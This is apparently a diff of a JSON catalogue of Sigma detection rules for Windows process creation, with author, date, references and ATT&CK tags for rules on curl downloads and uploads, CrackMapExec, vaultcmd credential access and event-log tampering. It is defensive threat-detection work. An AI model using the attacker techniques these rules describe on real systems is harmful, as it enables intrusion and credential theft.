"7090adee-82e2-4269-bd59-80691e7c6338", - "value": "CHCP CodePage Locale Lookup" - }, - { - "description": "Detects a code page switch in command line or batch scripts to a rare language", - "meta": { - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2019/10/14", - "falsepositive": [ - "Administrative activity (adjust code pages according to your organisation's region)" - ], - "filename": "proc_creation_win_susp_codepage_switch.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", - "https://twitter.com/cglyer/status/1183756892952248325", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml" - ], - "tags": [ - "attack.t1036", - "attack.defense_evasion" - ] - }, - "uuid": "c7942406-33dd-4377-a564-0f62db0593a3", - "value": "Suspicious Code Page Switch" - }, - { - "description": "Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_commandline_chars.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml" - ], - "tags": "No established tags" - }, - "uuid": "2c0d2d7b-30d6-4d14-9751-7b9113042ab9", - "value": "Suspicious Characters in CommandLine" - }, - { - "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/11/11", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_command_flag_pattern.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml" - ], - "tags": "No established tags" - }, - "uuid": "50d66fb0-03f8-4da0-8add-84e77d12a020", - "value": "Suspicious RunAs-Like Flag Combination" - }, - { - "description": "Detects suspicious command line arguments of common data compression tools", - "meta": { - "author": "Florian Roth, Samir Bousseaden", - "creation_date": "2019/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_compression_params.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1184067445612535811", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "uuid": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "value": "Suspicious Compression Tool Parameters" - }, - { - "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", - "meta": { - "author": "omkar72", - "creation_date": "2020/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_conhost.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "7dc2dedd-7603-461a-bc13-15803d132355", - "value": "Conhost Parent Process Executions" - }, - { - "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application", - "meta": { - "author": "frack113", - "creation_date": "2022/04/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_conhost_option.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", - "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539", - "value": "Suspicious Conhost Legacy Option" - }, - { - "description": "Detects a suspicious process pattern found in CVE-2021-40444 exploitation", - "meta": { - "author": "@neonprimetime, Florian Roth", - "creation_date": "2021/09/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_control_cve_2021_40444.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", - "https://twitter.com/neonprimetime/status/1435584010202255375", - "https://www.joesandbox.com/analysis/476188/1/iochtml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "894397c6-da03-425c-a589-3d09e7d1f750", - "value": "CVE-2021-40444 Process Pattern" - }, - { - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/04/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_control_dll_load.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/rikvduijn/status/853251879320662017", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "value": "Suspicious Control Panel DLL Load" - }, - { - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "meta": { - "author": "Florian Roth, oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", - "creation_date": "2019/12/30", - "falsepositive": [ - "Administrative scripts" - ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1211636381086339073", - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" - ] - }, - "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - "value": "Copy from Admin Share" - }, - { - "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", - "meta": { - "author": "Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)", - "creation_date": "2020/07/03", - "falsepositive": [ - "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", - "When cmd.exe and xcopy.exe are called directly", - "When the command contains the keywords but not in the correct order" - ], - "filename": "proc_creation_win_susp_copy_system32.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ] - }, - "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", - "value": "Suspicious Copy From or To System32" - }, - { - "description": "Detects suspicious command lines used in Covenant luanchers", - "meta": { - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2020/06/04", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_susp_covenant.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/covenant-v0-5-eee0507b85ba", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_covenant.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" - ] - }, - "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", - "value": "Covenant Launcher Indicators" - }, - { - "description": "Detect various execution methods of the CrackMapExec pentesting framework", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2020/05/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_crackmapexec_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/byt3bl33d3r/CrackMapExec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" - ] - }, - "uuid": "058f4380-962d-40a5-afce-50207d36d7e2", - "value": "CrackMapExec Command Execution" - }, - { - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_crackmapexec_flags.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", - "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml" - ], - "tags": "No established tags" - }, - "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "value": "CrackMapExec Command Line Flags" - }, - { - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2020/05/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/byt3bl33d3r/CrackMapExec", - "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027.005" - ] - }, - "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", - "value": "CrackMapExec PowerShell Obfuscation" - }, - { - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/02/11", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_csc.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1094924091256176641", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" - ] - }, - "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", - "value": "Suspicious Parent of Csc.exe" - }, - { - "description": "Adversaries may abuse Visual Basic (VB) for execution", - "meta": { - "author": "frack113", - "creation_date": "2022/01/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_cscript_vbs.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cscript_vbs.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005" - ] - }, - "uuid": "23250293-eed5-4c39-b57a-841c8933a57d", - "value": "Cscript Visual Basic Script Execution" - }, - { - "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/08/24", - "falsepositive": [ - "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", - "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" - ], - "filename": "proc_creation_win_susp_csc_folder.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", - "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", - "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", - "https://twitter.com/gN3mes1s/status/1206874118282448897", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.004" - ] - }, - "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", - "value": "Suspicious Csc.exe Source File Folder" - }, - { - "description": "Detects the use of the lesser known remote execution tool named CsExec (a PsExec alternative)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_csexec.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/malcomvetter/CSExec", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csexec.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31", - "value": "CsExec Remote Execution Tool Usage" - }, - { - "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", - "meta": { - "author": "Konstantin Grishchenko, oscd.community", - "creation_date": "2020/10/17", - "falsepositive": [ - "Legitimate usage by software developers" - ], - "filename": "proc_creation_win_susp_csi.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", - "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", - "https://twitter.com/Z3Jpa29z/status/1317545798981324801", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml" - ], - "tags": [ - "attack.execution", - "attack.t1072", - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e", - "value": "Suspicious Csi.exe Usage" - }, - { - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali (updated)", - "creation_date": "2020/07/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_curl_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/max_mal_/status/1542461200797163522", - "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", - "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", - "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", - "value": "Suspicious Curl Usage on Windows" - }, - { - "description": "Detects a suspicious curl process start the adds a file to a web request", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/03", - "falsepositive": [ - "Scripts created by developers and admins" - ], - "filename": "proc_creation_win_susp_curl_fileupload.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/d1r4c/status/1279042657508081664", - "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", - "https://curl.se/docs/manpage.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" - ] - }, - "uuid": "00bca14a-df4e-4649-9054-3f2aa676bc04", - "value": "Suspicious Curl File Upload" - }, - { - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "meta": { - "author": "Sreeman, Nasreddine Bencherchali", - "creation_date": "2020/01/13", - "falsepositive": [ - "Administrative scripts (installers)" - ], - "filename": "proc_creation_win_susp_curl_start_combo.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_start_combo.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "value": "Curl Start Combination" + "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", + "value": "Suspicious Where Execution" }, { "description": "Detects a suspicious curl process start on Windows with set useragent options", @@ -49180,3748 +42545,131 @@ "value": "Suspicious Curl Change User Agents" }, { - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/01/28", - "falsepositive": [ - "Unknown yet" - ], - "filename": "proc_creation_win_susp_dctask64_proc_inject.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095963789111296", - "https://twitter.com/gN3mes1s/status/1222095371175911424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ] - }, - "uuid": "6345b048-8441-43a7-9bed-541133633d7a", - "value": "ZOHO Dctask64 Process Injection" - }, - { - "description": "Detects suspicious command line to remove and 'exe' or 'dll'", + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", "meta": { "author": "frack113", - "creation_date": "2021/12/02", + "creation_date": "2022/04/08", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_del.yml", + "filename": "proc_creation_win_susp_vaultcmd.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_del.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vaultcmd.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.credential_access", + "attack.t1555.004" ] }, - "uuid": "204b17ae-4007-471b-917b-b917b315c5db", - "value": "Suspicious Del in CommandLine" + "uuid": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "value": "Windows Credential Manager Access via VaultCmd" }, { - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", + "description": "Detects usage of the wevtutil utility to perform reconnaissance", "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/03", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitmate usage of the utility by administrators to query the event log" ], - "filename": "proc_creation_win_susp_desktopimgdownldr.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", - "https://twitter.com/SBousseaden/status/1278977301745741825", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "value": "Suspicious Desktopimgdownldr Command" - }, - { - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/11", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_devinit_lolbin.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1460815932402679809", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "90d50722-0483-4065-8e35-57efaadd354d", - "value": "DevInit Lolbin Download" - }, - { - "description": "The Devtoolslauncher.exe executes other binary", - "meta": { - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", - "creation_date": "2019/10/12", - "falsepositive": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" - ], - "filename": "proc_creation_win_susp_devtoolslauncher.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", - "https://twitter.com/_felamos/status/1179811992841797632", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "value": "Devtoolslauncher.exe Executes Specified Binary" - }, - { - "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", - "meta": { - "author": "frack113", - "creation_date": "2021/12/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_dir.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dir.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1217" - ] - }, - "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", - "value": "Suspicious DIR Execution" - }, - { - "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" - ], - "filename": "proc_creation_win_susp_direct_asep_reg_keys_modification.yml", + "filename": "proc_creation_win_wevtutil_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml" + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml" ], "tags": [ + "attack.discovery" + ] + }, + "uuid": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", + "value": "Wevtutil Recon" + }, + { + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "meta": { + "author": "MSTIC, FPT.EagleEye", + "creation_date": "2021/06/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_sourgrum.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", + "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" + ], + "tags": [ + "attack.t1546", + "attack.t1546.015", "attack.persistence", - "attack.t1547.001" + "attack.privilege_escalation" ] }, - "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", - "value": "Direct Autorun Keys Modification" + "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "value": "SOURGUM Actor Behaviours" }, { - "description": "Detects command that is used to disable or delete Windows eventlog via logman Windows utility", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/11", - "falsepositive": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" - ], - "filename": "proc_creation_win_susp_disable_eventlog.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1359039665232306183?s=21", - "https://ss64.com/nt/logman.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" - ] - }, - "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", - "value": "Disable or Delete Windows Eventlog" - }, - { - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/06/19", - "falsepositive": [ - "Unknown, maybe some security software installer disables these features temporarily" - ], - "filename": "proc_creation_win_susp_disable_ie_features.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "value": "Disabled IE Security Features" - }, - { - "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/01/21", - "falsepositive": [ - "Legitimate deinstallation by administrative staff" - ], - "filename": "proc_creation_win_susp_disable_raccine.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/Raccine", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", - "value": "Raccine Uninstall" - }, - { - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "meta": { - "author": "Ivan Dyachkov, oscd.community", - "creation_date": "2020/10/07", - "falsepositive": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." - ], - "filename": "proc_creation_win_susp_diskshadow.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_diskshadow.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - 